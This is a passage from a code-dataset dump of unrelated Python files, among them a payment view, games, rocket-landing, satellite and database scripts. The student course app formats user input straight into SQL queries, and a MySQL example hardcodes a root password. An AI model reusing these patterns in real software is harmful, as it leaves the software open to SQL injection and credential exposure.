LabeledOrderingFilter\nfrom core.filters.SearchFilter import SearchFilter\nfrom core.forms.BootstrapForm import BootstrapForm\nfrom core.mixins.AjaxTemplateResponseMixin import AjaxTemplateResponseMixin\nfrom core.mixins.ExportAsCSVMixin import ExportAsCSVMixin\nfrom core.mixins.ListItemUrlMixin import ListItemUrlMixin\nfrom core.mixins.ModelFieldsViewMixin import ModelFieldsViewMixin\nfrom payments.forms.FeeComment import FeeCommentForm\nfrom payments.forms.payment import PaymentForm, UpdatePaymentForm\nfrom payments.models import PendingPayment, CardPayment\nfrom sermepa.forms import SermepaPaymentForm\nfrom sermepa.models import SermepaIdTPV\nfrom sermepa.signals import payment_was_successful, payment_was_error, signature_error\n\n\ndef generate_payment_form(payment_uuid, URL_params=''):\n site = Site.objects.get_current()\n merchant_data = 0\n trans_type = '0'\n card_payment, already_paid = PendingPayment.objects.get_card_payment(reference=payment_uuid)\n\n if already_paid:\n return True, None, None\n\n if card_payment:\n merchant_data = card_payment.pk\n amount = int(card_payment.amount * 100)\n else:\n return False, None, None\n\n # Redirect to local processor if we are in debug\n view_OK = 'sermepa_ipn' if settings.SERMEPA_DEBUG else 'payments:payment_success'\n view_KO = 'sermepa_ipn' if settings.SERMEPA_DEBUG else 'payments:payment_error'\n\n sermepa_dict = {\n \"Ds_Merchant_Titular\": card_payment.account.display_name,\n \"Ds_Merchant_MerchantData\": 
merchant_data,\n \"Ds_Merchant_MerchantName\": settings.SERMEPA_MERCHANT_NAME,\n \"Ds_Merchant_ProductDescription\": card_payment.concept,\n \"Ds_Merchant_Amount\": amount,\n \"Ds_Merchant_Terminal\": settings.SERMEPA_TERMINAL,\n \"Ds_Merchant_MerchantCode\": settings.SERMEPA_MERCHANT_CODE,\n \"Ds_Merchant_Currency\": settings.SERMEPA_CURRENCY,\n \"Ds_Merchant_MerchantURL\": \"https://%s%s\" % (site.domain, reverse('sermepa_ipn')),\n \"Ds_Merchant_UrlOK\": \"https://%s%s\" % (site.domain, reverse(view_OK)) + URL_params,\n \"Ds_Merchant_UrlKO\": \"https://%s%s\" % (site.domain, reverse(view_KO)) + URL_params,\n }\n\n order = SermepaIdTPV.objects.new_idtpv()\n sermepa_dict.update({\n \"Ds_Merchant_Order\": order,\n \"Ds_Merchant_TransactionType\": trans_type,\n })\n form = SermepaPaymentForm(initial=sermepa_dict, merchant_parameters=sermepa_dict)\n\n return False, card_payment, form\n\n\n\n@xframe_options_exempt\ndef form(request, uuid):\n\n # print \"http://%s%s\" % (site.domain, reverse('sermepa_ipn'))\n params = '' if not 'from_app' in request.GET else '?from_app=true'\n\n payment = PendingPayment.objects.filter(reference=uuid).first()\n if payment and payment.completed:\n return HttpResponse(render_to_response('payments/pay_form_paid.html',\n {'request': request, 'uuid': uuid, 'payment': payment}))\n\n paid, card_payment, form = generate_payment_form(uuid, URL_params=params)\n if paid:\n return HttpResponse(render_to_response('payments/pay_form_paid.html',\n {'request': request, 'uuid': uuid, 'payment': payment,\n 'card_payment': card_payment}))\n\n return HttpResponse(render_to_response('payments/pay_form.html',\n {'request': request, 'uuid': uuid, 'payment': payment, 'form': form,\n 'card_payment': card_payment, 'debug': settings.SERMEPA_DEBUG}))\n\n\n@xframe_options_exempt\ndef payment_success(request):\n return HttpResponse(render_to_response('payments/end.html', {}))\n\n@xframe_options_exempt\ndef payment_error(request):\n return HttpResponse(render_to_response('payments/error.html', {}))\n\n\ndef payment_ok(sender, **kwargs):\n print('Payment ok!')\n PendingPayment.objects.process_sermepa_payment(sender)\n\n\ndef payment_ko(sender, **kwargs):\n print('Payment bad!')\n\n\ndef sermepa_ipn_error(sender, **kwargs):\n print('ipn error!')\n\n\npayment_was_successful.connect(payment_ok)\npayment_was_error.connect(payment_ko)\nsignature_error.connect(sermepa_ipn_error)","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"payments/views/sermepa_form.py","file_name":"sermepa_form.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"25652401113","text":"import pygame\n\nclass Ship():\n def __init__(self, main_game):\n super().__init__()\n \n self.screen = main_game.screen\n self.screen_rect = main_game.screen.get_rect()\n\n self.image = pygame.image.load('./img/ship.png')\n self.rect = self.image.get_rect()\n self.rect.midleft = self.screen_rect.midleft\n\n self.y = float(self.rect.y)\n self.ship_speed = 1.2\n\n self.moving_up = False\n self.moving_down = False\n\n\n def update(self):\n if self.moving_up and self.rect.top > 0:\n self.y -= self.ship_speed\n if self.moving_down and self.rect.bottom < self.screen_rect.bottom:\n self.y += self.ship_speed\n \n self.rect.y = self.y\n\n\n def blitme(self):\n self.screen.blit(self.image, 
self.rect)","repo_name":"nlarrea/apuntes-de-python","sub_path":"EJERCICIOS/12_creating_games/04_tirador_lateral/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22990920488","text":"import os\nimport util\nimport unit\nfrom capstone import *\nfrom tqdm import tqdm\n\nclass Dump():\n def __init__(self, binary_name, dmp_path):\n self.dmp_path = dmp_path\n self.binary_name = binary_name\n \n self.funcs = util.load_from_dmp(self.dmp_path)\n print(binary_name)\n # print(self.funcs)\n \n self.md = Cs(CS_ARCH_X86, CS_MODE_64)\n self.func_dict = dict()\n self.build_text()\n \n \n def build_text(self):\n f_addrs = sorted(self.funcs.keys())\n # print(f_addrs)\n \n # bar = util.ProgressBar(len(f_addrs), name=\"Creating Plain Text...:\")\n for f_idx, f_addr in enumerate(f_addrs):\n F = self.funcs[f_addr]\n # print(F)\n self.func_dict[F.name] = []\n if not F.is_linker_func:\n bb_addrs = sorted(F.bbls.keys())\n for bb_addr in bb_addrs:\n BB = F.bbls[bb_addr]\n instn_addrs = sorted(BB.instns.keys())\n \n for instn_addr in instn_addrs:\n I = BB.instns[instn_addr]\n # print(I.cs_instr)\n # print([x for x in self.md.disasm(I.raw_bytes, 0x0)][0])\n cs_instr = [x for x in self.md.disasm(I.raw_bytes, 0x0)][0]\n if not cs_instr or cs_instr.mnemonic == 'nop':\n continue\n \n opcode = cs_instr.mnemonic\n operands = cs_instr.op_str\n if operands == '':\n instruction = opcode\n else:\n instruction = opcode + ' ' + operands\n instruction = instruction.replace(' + ', '+')\n instruction = instruction.replace(' - ', '-')\n instruction = instruction.replace(',', '')\n instruction = instruction.replace(' ', '_')\n # print(instruction)\n self.func_dict[F.name].append(instruction)\n # bar += 1\n with open(\"./dataset/plain_source.txt\", mode='a', encoding='utf-8') as f:\n for func in tqdm(self.func_dict):\n f.write(', '.join(self.func_dict[func]) + '\\n')\n \n with open(\"./dataset/test_target.txt\", mode='a', encoding='utf-8') as f:\n for func in tqdm(self.func_dict):\n name = func.replace(\"__\", \"\")\n name = name.replace(\"_\", \" \")\n # if first char is space, remove it\n if name[0] == ' ':\n name = name[1:]\n f.write(name + '\\n')\n \n \n \n\n\n\nif __name__ == \"__main__\":\n # delete ./dataset/test_source.txt and ./dataset/test_target.txt at start\n if os.path.exists(\"./dataset/plain_source.txt\"):\n os.remove(\"./dataset/plain_source.txt\")\n if os.path.exists(\"./dataset/test_source.txt\"):\n os.remove(\"./dataset/test_source.txt\")\n if os.path.exists(\"./dataset/test_target.txt\"):\n os.remove(\"./dataset/test_target.txt\")\n binary_dir = \"./target_binary\"\n \n for root, dirs, files in os.walk(binary_dir):\n for file in files:\n \n # if ends with .dmp.gz\n binname, ext = os.path.splitext(file)\n if ext == '.gz':\n binname, _ = os.path.splitext(binname)\n print(binname, file)\n Dump(binname, os.path.join(root, file))\n \n ## run bpe\n # cmd: subword-nmt apply-bpe --codes ../vocab/pretrained_bpe_voca.voc --input ./dataset/plain_source.txt --output ./dataset/test_source.txt\n \n # os.system(\"subword-nmt apply-bpe --codes ../vocab/pretrained_bpe_voca.voc --input ./dataset/plain_source.txt --output ./dataset/test_source.txt\")\n os.system(\"subword-nmt apply-bpe --codes ./vocab/pretrained_bpe_voca.voc --input ./ida_preprocessing/dataset/plain_source.txt --output ./dataset/test_source.txt\")\n 
","repo_name":"wldyd423/AsmDepictor","sub_path":"ida_preprocessing/simple_bpe_normalization.py","file_name":"simple_bpe_normalization.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"14214416268","text":"#==============================================================================\n# trans = {'0':'ling', '1':'yi', '2':'er', '3':'san', '4': 'si',\n# '5':'wu', '6':'liu', '7':'qi', '8':'ba', '9':'jiu', '10': 'shi'}\n# \n# def convert_to_mandarin(us_num):\n# '''\n# us_num, a string representing a US number 0 to 99\n# returns the string mandarin representation of us_num\n# '''\n# int_num = int(us_num)\n# str_num = ''\n# \n# if int_num > 10 and int_num < 20:\n# str_num += trans['10'] + ' ' + trans[str(int_num % 10)]\n# elif int_num > 19 and int_num < 100:\n# tens = int_num // 10\n# ones = int_num % 10\n# str_num += trans[str(tens)] + ' ' + trans['10']\n# if not ones == 0:\n# str_num += ' ' + trans[str(ones)]\n# else:\n# str_num = trans[us_num]\n# \n# return str_num\n#==============================================================================\n\n\ndef longest_run(L):\n \"\"\"\n Assumes L is a list of integers containing at least 2 elements.\n Finds the longest run of numbers in L, where the longest run can\n either be monotonically increasing or monotonically decreasing. \n In case of a tie for the longest run, choose the longest run \n that occurs first.\n Does not modify the list.\n Returns the sum of the longest run. \n \"\"\"\n current_streak = 0\n longest_streak = 0 \n current_start = 0\n longest_start = 0\n \n for i in range(1,len(L)):\n if L[i] >= L[i-1]:\n current_streak += 1\n if current_streak > longest_streak:\n longest_streak = current_streak\n longest_start = current_start\n else:\n current_streak = 0\n current_start = i\n \n sum = 0\n for i in range(longest_start, longest_start + longest_streak + 1):\n sum += L[i]\n ascending = (sum, longest_start, longest_streak)\n\n\n current_streak = 0\n longest_streak = 0 \n current_start = 0\n longest_start = 0\n \n for i in range(1,len(L)):\n if L[i] <= L[i-1]:\n current_streak += 1\n if current_streak > longest_streak:\n longest_streak = current_streak\n longest_start = current_start\n else:\n current_streak = 0\n current_start = i\n \n sum = 0\n for i in range(longest_start, longest_start + longest_streak + 1):\n sum += L[i]\n descending = (sum, longest_start, longest_streak)\n \n if(ascending[0] > descending[0]):\n return ascending[0]\n else:\n return descending[0]\n \n \n \n \n \nprint(str(longest_run([1, 2, 3, 4, 5, 6, 7, 8, 9])) + \" 45\")\nprint(str(longest_run([1, 2, 3, 2, 1])) + \" 6\") \nprint(str(longest_run([3, 2, 1, 2, 3])) + \" 6\") \nprint(str(longest_run([1, 2, 1, 2, 1, 2, 1, 2, 1])) + \" 3\") \nprint(str(longest_run([1, 2, 3, 4, 5, 0, 10, 1, 2, 3, 4, 5])) + \" 15\") #15\nprint(str(longest_run([1, 2, 3, 10, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1])) + \" 65\")\n\n","repo_name":"pabaier/classes-student","sub_path":"6001/FinalExam/finalExam.py","file_name":"finalExam.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8706746111","text":"import typing as t\nfrom ._keys import (\n JWKRegistry,\n KeySet,\n OctKey,\n RSAKey,\n ECKey,\n OKPKey,\n Key,\n)\nfrom .rfc8812 import register_secp256k1\nfrom .registry import Header\n\n\n__all__ = [\n \"JWKRegistry\",\n \"Key\",\n \"KeyCallable\",\n \"KeyFlexible\",\n \"OctKey\",\n \"RSAKey\",\n 
\"ECKey\",\n \"OKPKey\",\n \"KeySet\",\n \"guess_key\",\n]\n\nregister_secp256k1()\n\n\nclass GuestProtocol(t.Protocol): # pragma: no cover\n def headers(self) -> Header:\n ...\n\n def set_kid(self, kid: str) -> None:\n ...\n\n\nKeyCallable = t.Callable[[GuestProtocol], Key]\nKeyFlexible = t.Union[str, bytes, Key, KeySet, KeyCallable]\n\n\ndef guess_key(key: KeyFlexible, obj: GuestProtocol, use_random: bool = False) -> Key:\n \"\"\"Guess key from a various sources.\n\n :param key: a very flexible key\n :param obj: a protocol that has ``headers`` and ``set_kid`` methods\n :param use_random: pick a random key from key set\n \"\"\"\n headers = obj.headers()\n\n rv_key: Key\n if isinstance(key, (str, bytes)):\n rv_key = OctKey.import_key(key)\n\n elif isinstance(key, (OctKey, RSAKey, ECKey, OKPKey)):\n rv_key = key\n\n elif isinstance(key, KeySet):\n kid = headers.get(\"kid\")\n if not kid and use_random:\n # choose one key by random\n rv_key = key.pick_random_key(headers[\"alg\"]) # type: ignore[assignment]\n if rv_key is None:\n raise ValueError(\"Invalid key\")\n rv_key.ensure_kid()\n assert rv_key.kid is not None # for mypy\n obj.set_kid(rv_key.kid)\n else:\n rv_key = key.get_by_kid(kid)\n\n elif callable(key):\n rv_key = key(obj)\n\n else:\n raise ValueError(\"Invalid key\")\n\n return rv_key\n","repo_name":"alonbl/joserfc","sub_path":"src/joserfc/jwk.py","file_name":"jwk.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8085912944","text":"import math\nimport time\nimport krpc\n\ndef dot_product(u, v):\n return u[0]*v[0] + u[1]*v[1] + u[2]*v[2]\n\ndef magnitude(v):\n return math.sqrt(dot_product(v, v))\n\nlanding_legs_altitude = 15000\nsuicide_burn_ending_altitude = 100\nsuicide_burn_speed_target = 20\nsoft_landing_speed = 6.0\n\nconn = krpc.connect(name='Falcon 7')\nvessel = conn.space_center.active_vessel\n\n# Set up streams for telemetry\nut = conn.add_stream(getattr, conn.space_center, 'ut')\naltitude = conn.add_stream(getattr, vessel.flight(), 'mean_altitude')\nsurf_altitude = conn.add_stream(getattr, vessel.flight(), 'surface_altitude')\n#velocity = conn.add_stream(getattr, vessel.velocity(vessel.surface_reference_frame))\n# speed = conn.add_stream(getattr, vessel.flight(), 'speed')\n\n#get kerbin's body class\nbodies = conn.space_center.bodies\nkerbin_body = bodies['Kerbin']\n\n# turn on air-brakes\nvessel.control.brakes = True\n# retract landing gear for re-entry\nvessel.control.gear = False\n\n# calculate TWRmax for suicide burn\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\nprint('Max thrust to weight ratio: {0}'.format(TWRmax))\nvelocity = vessel.velocity(kerbin_body.reference_frame)\nspeed = magnitude(velocity)\nprint('Vessel speed: {0}'.format(speed))\nstopping_distance = (speed ** 2) / ((2.0 * 9.81) * (TWRmax - 1.0))\nprint('Current stopping distance at {0} meters: {1} meters'.format(speed,stopping_distance))\n\nwhile True:\n # wait until we are moving slow enough to deploy landing legs\n if altitude() < landing_legs_altitude:\n vessel.control.gear = True\n break\n\nprint('Landing gear deployed.')\n\nvelocity = vessel.velocity(kerbin_body.reference_frame)\nspeed = magnitude(velocity)\nstopping_distance = (speed ** 2) / ((2.0 * 9.81) * (TWRmax - 1.0))\nprint('Current stopping distance at {0} meters: {1} meters'.format(speed,stopping_distance))\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n stopping_distance = 
(speed**2)/((2.0*9.81)*(TWRmax - 1.0))\n if surf_altitude() < (stopping_distance + suicide_burn_ending_altitude):\n break\n\nvessel.control.throttle = 1.0\nvessel.control.rcs = True\nvessel.control.sas = True\n\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n if speed < suicide_burn_speed_target:\n vessel.control.throttle = 0.0\n break\n\n# soft landing:\n# part one: slow to target velocity\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\ntarget_twr = 1.2\nvessel.control.throttle = (target_twr / TWRmax)\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n if speed < soft_landing_speed:\n break\n\n#part two: target velocity until touchdown\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\ntarget_twr = 1.0\nvessel.control.throttle = (target_twr / TWRmax)\ntime.sleep(2)\nvessel.control.throttle = 0.0\n","repo_name":"RyanJHeld/krpc","sub_path":"src/landing/land_first_stage.py","file_name":"land_first_stage.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29017932674","text":"from random import randint\nfrom datetime import datetime\nfrom dateutil import parser\n\nfrom db.executer import execute_query, execute_command\n\n\nclass student:\n\n def __init__(self, name, password, id = \"\"):\n self.name = name\n self.password = password\n self.email = self.name + \"_stu@faculty.edu\"\n print(\"Account created for student {0} with Email {1}\".format(self.name,self.email)) if id == \"\" else None\n self.id = \"S\" + self.name[0:2].upper() + str(randint(100000000,999999999)) if id == \"\" else id\n\n def viewCourses(self) -> None:\n data = execute_query(\"\"\"SELECT id, name, code, doc FROM courses\"\"\")\n for c in data:\n print(\"{0}: course {1} with code {2} being teached by {3}\".format(c[0], c[1], c[2], c[3]))\n\n def enroll(self) -> None:\n self.viewCourses()\n index = int(input(\"Enter an index: \"))\n execute_command(\"\"\"INSERT INTO enrollment VALUES('%s', (SELECT code FROM courses WHERE id = %s))\"\"\" % (self.id, index))\n\n def viewCoursesStudying(self) -> None:\n data = execute_query(\"\"\"(SELECT course_code FROM enrollment WHERE student_id = '%s')\"\"\" % (self.id))\n for c in data:\n records = execute_query(\"\"\"SELECT name, doc, code FROM courses WHERE code = '%s'\"\"\" % (c[0]))\n for r in records:\n print(\"course {0} being teached by {1} with code {2}\".format(r[0], r[1], r[2]))\n\n def unenroll(self) -> None:\n self.viewCoursesStudying()\n code = input(\"Enter course code to unenroll: \")\n execute_command(\"\"\"DELETE FROM enrollment WHERE student_id = '%s' AND course_code = '%s'\"\"\" %(self.id, code))\n\n def post(self) -> None:\n post = input(\"Create a post: \")\n execute_command(\"\"\"INSERT INTO timeline VALUES ('%s', 'student', '%s', '%s', '%s', '%s')\"\"\" % (self.id[0:5] + str(randint(1000,10000)), self.id, self.name, post, datetime.now()))\n\n def reply(self, post_id) -> None:\n reply = input(\"reply: \")\n execute_command(\"\"\"INSERT INTO replies VALUES ('%s', '%s', '%s', '%s')\"\"\" %(post_id, self.name, reply, datetime.now()))\n\n def viewPosts(self) -> None:\n print(\"posts:\")\n data = execute_query(\"\"\"SELECT publisher_name, publisher, post, created_at FROM timeline WHERE publisher_id = '%s'\"\"\" %(self.id))\n for r in data:\n print(\"---------------------------------------------------------------\")\n minuits = int((datetime.now() - 
parser.parse(r[3])).total_seconds())\n print('\\n'.join([r[0] + \" ({0})\".format(r[1]) + \":\", r[2], str(minuits) + \" minuits\" if minuits < 60 else str(r[3])]))\n print(\"---------------------------------------------------------------\")\n \n def viewTimeLine(self) -> None:\n print(\"Time Line:\")\n data = execute_query(\"\"\"SELECT post_id, publisher_name, publisher, post, created_at FROM timeline\"\"\")\n for r in data:\n print(\"---------------------------------------------------------------\")\n minuits = int((datetime.now() - parser.parse(r[4])).total_seconds() / 60)\n print('\\n'.join([r[1] + \" ({0})\".format(r[2]) + \":\", r[3], str(minuits) + \" minuits\" if minuits < 60 else str(r[4])]))\n print(\"---------------------------------------------------------------\")\n index = int(input(\"Enter 1 to reply, 2 to view replies or any key to view next post: \"))\n if index == 1:\n self.reply(r[0])\n elif index == 2:\n records = execute_query(\"\"\"SELECT replier, reply, created_at FROM replies WHERE post_id = '%s'\"\"\" %(r[0]))\n for record in records:\n m = int((datetime.now() - parser.parse(record[2])).total_seconds() / 60)\n print('\\n'.join([record[0], record[1], str(m) + \" minuits\" if m < 60 else str(record[2])]))\n print(\"---------------------------------------------------------------\")\n else:\n continue\n \n def profile(self) -> None:\n print('\\n'.join([\"student: {0}\".format(self.name),\"Email: {0}\".format(self.email),\"ID: {0}\".format(self.id),\"Enrolled in:\"]))\n self.viewCoursesStudying()\n self.viewPosts()\n \n @staticmethod\n def menu() -> int:\n index = int(input('\\n'.join([\"Enter 1 to Enroll in course\",\n \"Enter 2 to unenroll from a course\",\n \"Enter 3 to view profile\",\n \"Enter 4 to post\",\n \"Enter 5 to view time line\",\n \"Enter 6 to log out\",\": \"])))\n return index","repo_name":"EbraheemTammam/EMS","sub_path":"models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10085007965","text":"'''\nINPUT:\n - S5P (TROPOPMI) L2 product files\nOUTPUT:\n S5P pixel area file (s5p_pixel_area.nc)\nUPDATE:\n Xin Zhang:\n 2022-05-18: Basic version\n'''\n\nimport xarray as xr\nfrom glob import glob\nfrom satpy import Scene\nfrom pyproj import Geod\nimport numpy as np\nfrom functools import lru_cache\n\n\ndef load_s5p(f_s5p):\n \"\"\"Load S5P longitude and latitude bounbary data\"\"\"\n scn = Scene(f_s5p, reader='tropomi_l2')\n scn.load(['assembled_lon_bounds', 'assembled_lat_bounds'])\n\n return scn\n\n\n@lru_cache(maxsize=2**10)\ndef calc_area():\n \"\"\"Calculate area of each pixel\"\"\"\n geod = Geod(ellps=\"WGS84\")\n\n len_x = lon_bnds.shape[0]-1\n len_y = lon_bnds.shape[1]-1\n area = np.full((len_x, len_y), 0)\n\n for x in range(len_x):\n for y in range(len_y):\n # get the corner coordinates\n lons = lon_bnds[x:x+2, y:y+2].ravel()\n lats = lat_bnds[x:x+2, y:y+2].ravel()\n\n # clockwise direction\n lons[-2], lons[-1] = lons[-1], lons[-2]\n lats[-2], lats[-1] = lats[-1], lats[-2]\n\n # get the area\n poly_area, poly_perimeter = geod.polygon_area_perimeter(lons, lats)\n area[x, y] = poly_area\n\n return area\n\ndef main():\n # get example file of low resolution and high resolution\n # because of the along-track pixel size reduction after 6 August 2019\n scn_low = load_s5p(glob('./tropomi/201908/*___20190805T193408*'))\n scn_high = load_s5p(glob('./tropomi/201908/*___20190806T191502*'))\n\n # lru_cache needs global 
variable \n global lon_bnds, lat_bnds \n\n lon_bnds = scn_low['assembled_lon_bounds'].values\n lat_bnds = scn_low['assembled_lat_bounds'].values\n area_low = xr.DataArray(calc_area(), dims=['y_low', 'x_low']).rename('area_low')\n area_low.attrs['units'] = 'm2'\n area_low.attrs['description'] = 'Area of TROPOMI low-resolution pixels before 6 August 2019'\n\n # clear the cache because the lon_bnds and lat_bnds are updated below\n calc_area.cache_clear()\n\n lon_bnds = scn_high['assembled_lon_bounds'].values\n lat_bnds = scn_high['assembled_lat_bounds'].values\n area_high = xr.DataArray(calc_area(), dims=['y_high', 'x_high']).rename('area_high')\n area_high.attrs['units'] = 'm2'\n area_high.attrs['description'] = 'Area of high-resolution TROPOMI pixels after 6 August 2019'\n\n # merge into one Dataset\n ds = xr.merge([area_low, area_high])\n ds.attrs['description'] = 'Area of TROPOMI pixels'\n\n # set encoding\n comp = dict(zlib=True, complevel=7)\n enc = {var: comp for var in ds.data_vars}\n\n # export file\n ds.to_netcdf(path='s5p_pixel_area.nc',\n engine='netcdf4',\n encoding=enc)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"zxdawn/S5P-LNO2","sub_path":"main/s5p_pixel_area.py","file_name":"s5p_pixel_area.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6500001986","text":"# Fetchmany-all.py\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\",\n\t\t\t\t\t \"a123456\",\"python\",port=3306,charset=\"utf8\")\n\n# pymysql.connect(keyword argument)\n#(Host,User,password[,purpose database][,port],charset)\n\ncur = db.cursor()\n\nsql_select = \"select * from t1;\"\ncur.execute(sql_select)\nprint(\"select 語句查出的紀錄個數為:\",cur.rowcount)\n\n# fetchmany(n) 取得結果集到第 n 條紀錄\ndata = cur.fetchmany(2)\nprint(\"fetchmany 的結果為:\")\nfor i in data:\n\tprint(i)\n\ndata_all = cur.fetchall()\nprint(\"\\nfetchall 的結果為:\")\nfor i in data_all:\n\tprint(i)\n\ndb.commit()\ncur.close()\ndb.close()","repo_name":"Sapphire0912/Programming","sub_path":"MySQL/MySQL程式碼/Fetchmany-all.py","file_name":"Fetchmany-all.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27515196459","text":"# plot the Pc versus diff\nimport pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nfsize = 15\n\nfile_dir = os.getcwd() + '/'\nmaster_dir = file_dir + '/../../../Results' # gets master directory\nimg_dir = master_dir + '/'\nEthane_4Bar = pd.read_csv(img_dir + 'Ethane_298K_4Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\n# change \"-inf\" to -9\nEthane_4Bar['midpoints'][0] = -9\nEthane_4Bar['midpoints'][Ethane_4Bar['midpoints'] == 2] = 1\nEthane_4Bar = Ethane_4Bar.sort_values(by = ['midpoints'])\n\nEthane_20Bar = pd.read_csv(img_dir + 'Ethane_298K_20Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nEthane_20Bar['midpoints'][0] = -9\nEthane_20Bar['midpoints'][Ethane_20Bar['midpoints'] == 2] = 1\nEthane_20Bar = Ethane_20Bar.sort_values(by = ['midpoints'])\n\nEthane_40Bar = pd.read_csv(img_dir + 'Ethane_298K_40Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nEthane_40Bar['midpoints'][0] = -9\nEthane_40Bar['midpoints'][Ethane_40Bar['midpoints'] == 2] = 1\nEthane_40Bar = Ethane_40Bar.sort_values(by = ['midpoints'])\n\nPropane_1Bar = pd.read_csv(img_dir + 'Propane_298K_1Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nPropane_1Bar['midpoints'][0] = 
-9\nPropane_1Bar['midpoints'][Propane_1Bar['midpoints'] == 2] = 1\nPropane_1Bar = Propane_1Bar.sort_values(by = ['midpoints'])\n\nPropane_5Bar = pd.read_csv(img_dir + 'Propane_298K_5Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nPropane_5Bar['midpoints'][0] = -9\nPropane_5Bar['midpoints'][Propane_5Bar['midpoints'] == 2] = 1\nPropane_5Bar = Propane_5Bar.sort_values(by = ['midpoints'])\n\nPropane_10Bar = pd.read_csv(img_dir + 'Propane_298K_10Bar_CH3_1A/cm3overcm3/' +\"RF_VarImp.csv\")\nPropane_10Bar['midpoints'][0] = -9\nPropane_10Bar['midpoints'][Propane_10Bar['midpoints'] == 2] = 1\nPropane_10Bar = Propane_10Bar.sort_values(by = ['midpoints'])\n\ndef process_importances(data, condition):\n # first step, sort by importance, or %IncMSE\n data = data.sort_values(by = ['%IncMSE'], ascending = False)\n # second step, get the top 10, finally sort by midpoints, ascendingly\n Dataset = data.head(10).sort_values(by = ['midpoints'])\n # drop not needed columns\n Dataset = Dataset.drop(columns = ['midpoints', 'IncNodePurity'])\n # round %IncMSE\n Dataset['%IncMSE'] = Dataset.round({'%IncMSE': 2})\n # finally, rename the columns\n Dataset.columns = ['Histogram_Bin' if x=='varnames' else x for x in Dataset.columns]\n newnames = condition + '_' + Dataset.columns\n Dataset.columns = newnames\n Dataset = Dataset.reset_index(drop = True)\n return Dataset\n\nsheets = process_importances(Ethane_4Bar, \"Ethane_4Bar\")\nTemp = process_importances(Ethane_20Bar, \"Ethane_20Bar\")\n# https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Ethane_40Bar, \"Ethane_40Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_1Bar, \"Propane_1Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_5Bar, \"Propane_5Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_10Bar, \"Propane_10Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\n# finally, save it\nsheets.to_csv(file_dir + '/' + 'Feature-Importance.csv', index = False)\n#sheets.to_excel(file_dir + '/' + 'Feature-Importance.xlsx', index = False)\n#Temp['Propane_10Bar_varnames'] = Temp['Propane_10Bar_varnames'].astype(\"|S\")","repo_name":"snurr-group/energygrid","sub_path":"Manuscript-Figures/SI/Table S4/Generate_Table_S3.py","file_name":"Generate_Table_S3.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29305789576","text":"#!/usr/bin/env python3\nimport threading, time, subprocess, os, sys, signal\n\nCHANNELS={255,253} #listen these channels (data types)\n\n#\n# https://downloads.open-mesh.org/batman/manpages/alfred.8.html\n# ----------------------------------------------------------------------------------------------\nMSGDICT={}\nRUN=True\n\ndef signal_handler(sig, frame):\n print('CTRL+c. 
